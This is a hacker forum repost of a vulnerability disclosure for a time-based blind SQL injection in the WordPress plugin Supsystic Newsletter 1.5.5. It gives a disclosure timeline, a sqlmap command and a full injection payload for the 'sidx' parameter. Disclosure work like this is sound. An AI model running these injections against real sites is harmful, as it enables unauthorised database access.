跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection
# Date: 24/07 2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/newsletter-by-supsystic.1.5.5.zip
# Category: Web Application
# Version: 1.5.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2


# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 01/12 2020: Plugin/Project closed by WordPress Security team


# 1. Description

The GET parameter "sidx" does not sanitize user input when searching for existing subscribers.


# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for existing subscribers and save it to request.txt.
Referer: http://192.168.0.49/wp-admin/admin.php?page=newsletters-supsystic&tab=subscribers

sqlmap -r request.txt --dbms=mysql -p sidx

Parameter: sidx (GET)
	Type: time-based blind
	Payload: mod=subscribers&action=getListForTbl&pl=nbs&reqType=ajax&search[text_like]=testing&search[search_list]=0&_search=false&nd=1595780014444&rows=25&page=0&sidx=id AND (SELECT 1511 FROM (SELECT(SLEEP(5)))gTHi)&sord=desc

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。